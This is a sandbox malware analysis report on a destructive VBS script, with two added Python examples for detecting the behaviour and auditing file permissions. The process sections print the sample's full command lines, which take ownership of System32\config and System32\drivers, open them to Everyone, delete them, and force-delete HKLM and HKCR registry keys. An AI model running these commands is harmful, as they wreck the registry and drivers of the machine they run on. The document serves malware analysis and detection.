Malware Analysis Report

2024-11-16 12:52

Sample ID 240815-1krv7a1blp
Target code.vbs
SHA256 0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
8/10

SHA256

0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf

Threat Level: Likely malicious

The file code.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Both behavioral runs show the same chain. cmd.exe copies code.wsf to code.wsf.vbs and starts it under WScript.exe; the script then spawns two cmd.exe children that run takeown /f, icacls /grant everyone:(f) and del /s /q against C:\Windows\System32\config\* (the registry hive store: SAM, SECURITY, SOFTWARE, SYSTEM) and C:\Windows\System32\drivers\*. On the Windows 10 run WScript.exe additionally runs reg delete /f against HKCR\*.dll, HKCR\*.exe and HKLM\*, then launches regedit.exe. The "Possible privilege escalation attempt" signature fires on the takeown/icacls pair, but what the command lines describe is destruction of system files and registry data, not escalation: takeown grants ownership to the caller, icacls then opens the files to Everyone, and del removes whatever is not held open. Two caveats for impact assessment: takeown on files under System32 needs SeTakeOwnershipPrivilege, which only members of Administrators hold and which UAC strips from the filtered token, so the chain only succeeds when the script already runs elevated (the sandbox runs it as Admin); and files the kernel holds open, such as the loaded hives, survive the del while the rest of the directory contents do not. behavioral1 recorded no network traffic; the behavioral2 entries (one connection to g.bing.com and reverse-DNS lookups via 8.8.8.8) are not tied to any sample process in the report and are consistent with Windows 10 background activity rather than command-and-control.

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Enumerates physical storage devices

Modifies registry key

Runs regedit.exe

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:42

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:42

Reported

2024-08-15 21:45

Platform

win7-20240729-en

Max time kernel

120s

Max time network

121s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2108 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2108 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2108 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2356 wrote to memory of 1616 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2356 wrote to memory of 1616 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2356 wrote to memory of 1616 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2356 wrote to memory of 1856 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2356 wrote to memory of 1856 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2356 wrote to memory of 1856 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1616 wrote to memory of 2628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1616 wrote to memory of 2628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1616 wrote to memory of 2628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1856 wrote to memory of 2156 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1856 wrote to memory of 2156 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1856 wrote to memory of 2156 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1616 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1616 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1616 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1856 wrote to memory of 1812 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1856 wrote to memory of 1812 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1856 wrote to memory of 1812 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs

MD5 57a8ed12915b612b81ec573f56394818
SHA1 f834294e6d6a7150da076670825857960df8a7a2
SHA256 0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf
SHA512 2bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68

C:\Users\Admin\Desktop\GrantUpdate.vbs

MD5 1fafd3091b9297603ea9989bed793089
SHA1 03688ce88040e39d04ec4a182427cf0992c827d6
SHA256 84a4fba54d165a54fdb5e5fff87530ebf488e5da855cadac11d54582858e67ac
SHA512 8273cf8d90b26a8247e8ac0317c1266a5ae24ba82dffe5f8b7ca46cb5ab8746aaf1eea089a4a6c1a9c612bb7d6f69ea944ed55c113e4da01d4cf53ac8cd44571

C:\Users\Admin\Downloads\OpenPublish.wav

MD5 81051bcc2cf1bedf378224b0a93e2877
SHA1 ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA512 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:42

Reported

2024-08-15 21:43

Platform

win10v2004-20240802-en

Max time kernel

46s

Max time network

48s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A

Runs regedit.exe

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3888 wrote to memory of 3364 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 3888 wrote to memory of 3364 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 3364 wrote to memory of 2708 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3364 wrote to memory of 2708 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3364 wrote to memory of 2712 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3364 wrote to memory of 2712 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2708 wrote to memory of 4672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2708 wrote to memory of 4672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2712 wrote to memory of 2996 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2712 wrote to memory of 2996 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2708 wrote to memory of 4828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2708 wrote to memory of 4828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2712 wrote to memory of 4868 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2712 wrote to memory of 4868 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3364 wrote to memory of 1540 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3364 wrote to memory of 1540 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3364 wrote to memory of 2604 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3364 wrote to memory of 2604 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3364 wrote to memory of 3324 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3364 wrote to memory of 3324 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" delete HKCR\*.dll /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" delete HKCR\*.exe /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" delete HKLM\* /f

C:\Windows\regedit.exe

"C:\Windows\regedit.exe"
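A detection pass over the process chain listed above, added here as an example and not part of the sandbox report: it rebuilds the parent/child tree from process-creation events, then flags the takeown/icacls/del chain against System32\config and System32\drivers, the forced reg delete rooted at HKLM\* or HKCR\*.<ext>, and script-host-to-LOLBin spawns, reporting each hit with its ancestry. The events are constructed from the behavioral2 command lines and the PIDs in the WriteProcessMemory table; which command line belongs to which PID is an assumption (the report does not pair them), and every function and tag name is this example's own.

```python
"""Process-tree reconstruction plus rule matching for the takeown/icacls/del chain.

Added example, not from the sandbox report. EVENTS is constructed from the
behavioral2 command lines; the PID-to-command-line pairing is assumed.
"""
import re
from dataclasses import dataclass, field


@dataclass
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    children: list = field(default_factory=list)

    @property
    def name(self) -> str:
        # Basename of the image path, lower-cased, so rules are case-insensitive.
        return self.image.rsplit("\\", 1)[-1].lower()


# Constructed events: (pid, ppid, image, command line). PIDs come from the
# behavioral2 WriteProcessMemory table; the command line attached to each PID
# is an assumption made for this example.
EVENTS = [
    (3888, 0, r"C:\Windows\system32\cmd.exe",
     r'cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"'),
    (3364, 3888, r"C:\Windows\System32\WScript.exe",
     r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"'),
    (2708, 3364, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1'),
    (2712, 3364, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1'),
    (4672, 2708, r"C:\Windows\system32\takeown.exe", r"takeown /f c:\windows\system32\config\*"),
    (4828, 2708, r"C:\Windows\system32\icacls.exe", r"icacls c:\windows\system32\config\* /grant everyone:(f)"),
    (1540, 3364, r"C:\Windows\System32\reg.exe", r'"C:\Windows\System32\reg.exe" delete HKCR\*.dll /f'),
    (2604, 3364, r"C:\Windows\System32\reg.exe", r'"C:\Windows\System32\reg.exe" delete HKCR\*.exe /f'),
    (3324, 3364, r"C:\Windows\System32\reg.exe", r'"C:\Windows\System32\reg.exe" delete HKLM\* /f'),
]

# Directories the sample attacks: the registry hive store and the driver store.
PROTECTED_DIR = re.compile(r"\\windows\\system32\\(?:config|drivers)\\", re.I)
# Forced reg delete rooted at a hive (HKLM\*) or at a whole HKCR class (HKCR\*.exe).
REG_ROOT_DELETE = re.compile(r'reg(?:\.exe)?"?\s+delete\s+(?:hklm|hkcr)\\\*\S*\s+.*?/f\b', re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "reg.exe"}


def classify(p: Proc, parent) -> list:
    """Return the rule tags that fire for one process, given its parent (or None)."""
    tags = []
    c = p.cmdline.lower()
    # takeown -> icacls grant to everyone -> del, all in one cmd.exe line, on a protected dir
    if (p.name == "cmd.exe" and "takeown" in c and "icacls" in c and "everyone" in c
            and re.search(r"\bdel\s", c) and PROTECTED_DIR.search(c)):
        tags.append("acl_strip_and_delete_system_dir")
    if p.name == "reg.exe" and REG_ROOT_DELETE.search(c):
        tags.append("registry_root_delete")
    if parent is not None and parent.name in SCRIPT_HOSTS and p.name in LOLBINS:
        tags.append("script_host_spawns_lolbin")
    return tags


def build_tree(events) -> dict:
    procs = {pid: Proc(pid, ppid, img, cl) for pid, ppid, img, cl in events}
    for p in procs.values():
        if p.ppid in procs:
            procs[p.ppid].children.append(p)
    return procs


def ancestry(procs: dict, pid: int) -> list:
    """Image basenames from the root of the tree down to `pid`."""
    chain, p = [], procs.get(pid)
    while p is not None:
        chain.append(p.name)
        p = procs.get(p.ppid)
    return list(reversed(chain))


def analyse(events) -> list:
    procs = build_tree(events)
    findings = []
    for p in sorted(procs.values(), key=lambda x: x.pid):
        tags = classify(p, procs.get(p.ppid))
        if tags:
            findings.append({"pid": p.pid, "tags": tags, "chain": ancestry(procs, p.pid)})
    return findings


def verdict(findings) -> str:
    destructive = {"acl_strip_and_delete_system_dir", "registry_root_delete"}
    if any(destructive & set(f["tags"]) for f in findings):
        return "destructive"
    return "suspicious" if findings else "clean"


if __name__ == "__main__":
    results = analyse(EVENTS)
    for f in results:
        print(f["pid"], " -> ".join(f["chain"]), f["tags"])
    print("verdict:", verdict(results))
```

Fed real Sysmon Event ID 1 records (ProcessId, ParentProcessId, Image, CommandLine) instead of the constructed tuples, the same rules apply unchanged; the ancestry string is what lets a triage analyst see at a glance that a script host, not an administrator at a console, issued the takeown.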

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 36.58.20.217.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs

MD5 57a8ed12915b612b81ec573f56394818
SHA1 f834294e6d6a7150da076670825857960df8a7a2
SHA256 0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf
SHA512 2bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68

C:\Users\Admin\Desktop\ConvertToMove.vbs

MD5 1fafd3091b9297603ea9989bed793089
SHA1 03688ce88040e39d04ec4a182427cf0992c827d6
SHA256 84a4fba54d165a54fdb5e5fff87530ebf488e5da855cadac11d54582858e67ac
SHA512 8273cf8d90b26a8247e8ac0317c1266a5ae24ba82dffe5f8b7ca46cb5ab8746aaf1eea089a4a6c1a9c612bb7d6f69ea944ed55c113e4da01d4cf53ac8cd44571
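The check a responder would run on a host that executed this script, to learn whether the icacls grant from the "Modifies file permissions" signature actually landed: parse icacls output for explicit (non-inherited) full-control or modify entries granted to low-trust principals under the two targeted directories. This is an added example, not from the report. The icacls output is constructed to resemble `icacls C:\Windows\System32\config\*` after the grant hit one file, the LOW_TRUST list is this example's own, and principals containing spaces are only recognised for the well-known authorities named in the pattern.

```python
r"""Audit saved icacls output for explicit broad grants on protected directories.

Added example, not from the sandbox report. SAMPLE_ICACLS_OUTPUT is constructed;
on a live host capture it with:  icacls C:\Windows\System32\config\* > acl.txt
and pass the file's text to parse_icacls().
"""
import re

# Constructed icacls output (not captured from the report): SAM carries an
# explicit Everyone:(F) entry of the kind the sample's icacls line creates,
# SYSTEM still has only inherited entries.
SAMPLE_ICACLS_OUTPUT = r"""
C:\Windows\System32\config\SAM NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Administrators:(I)(F)
                               Everyone:(F)
C:\Windows\System32\config\SYSTEM NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)

Successfully processed 2 files; Failed processing 0 files
"""

# A principal is either a well-known authority (which contains a space) followed
# by "\name", or a single space-free token with an optional "DOMAIN\" prefix.
_PRINCIPAL = (r"(?:NT AUTHORITY|NT SERVICE|BUILTIN|CREATOR OWNER|APPLICATION PACKAGE AUTHORITY)\\[^:]+"
              r"|[^\s:\\]+(?:\\[^\s:]+)?")
_RIGHTS = r"(?:\([^()]*\))+"
ACE_RE = re.compile(rf"(?P<principal>{_PRINCIPAL}):(?P<rights>{_RIGHTS})\s*$")
FIRST_LINE_RE = re.compile(rf"^(?P<path>.*?)\s+(?P<principal>{_PRINCIPAL}):(?P<rights>{_RIGHTS})\s*$")
SUMMARY_RE = re.compile(r"Successfully processed (\d+) files; Failed processing (\d+) files")

# Principals that should never hold write-class rights under System32 (this example's list).
LOW_TRUST = {"everyone", r"builtin\users", r"nt authority\authenticated users", r"nt authority\interactive"}
WRITE_CLASS = {"F", "M", "W", "D", "WDAC", "WO"}


def parse_icacls(text: str) -> dict:
    """Map each path to its list of (principal, rights) ACEs.

    icacls prints the path and first ACE on one line and the remaining ACEs on
    indented continuation lines; blank and summary lines are skipped.
    """
    acls, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[:1].isspace():
            m = ACE_RE.match(line.strip())
            if m and current is not None:
                acls[current].append((m["principal"], m["rights"]))
            continue
        m = FIRST_LINE_RE.match(line)
        if m:
            current = m["path"]
            acls[current] = [(m["principal"], m["rights"])]
    return acls


def audit(acls: dict) -> list:
    """Flag write-class ACEs held by low-trust principals; note whether each is explicit."""
    findings = []
    for path, aces in acls.items():
        for principal, rights in aces:
            flags = set(re.findall(r"\(([^()]*)\)", rights))
            if principal.lower() in LOW_TRUST and flags & WRITE_CLASS:
                findings.append({"path": path, "principal": principal, "rights": rights,
                                 "explicit": "I" not in flags})
    return findings


def summary(text: str):
    """(processed, failed) counts from the trailer line, or None if absent."""
    m = SUMMARY_RE.search(text)
    return (int(m[1]), int(m[2])) if m else None


if __name__ == "__main__":
    acls = parse_icacls(SAMPLE_ICACLS_OUTPUT)
    for f in audit(acls):
        kind = "explicit" if f["explicit"] else "inherited"
        print(f"{f['path']}: {f['principal']} {f['rights']} ({kind})")
    print("files:", summary(SAMPLE_ICACLS_OUTPUT))
```

An explicit (non-inherited) Everyone entry on a hive file is the direct fingerprint of `icacls ... /grant everyone:(f)`; the same check over `C:\Windows\System32\drivers\*` covers the second command line, and a path missing from the output altogether is a candidate for the `del` having succeeded.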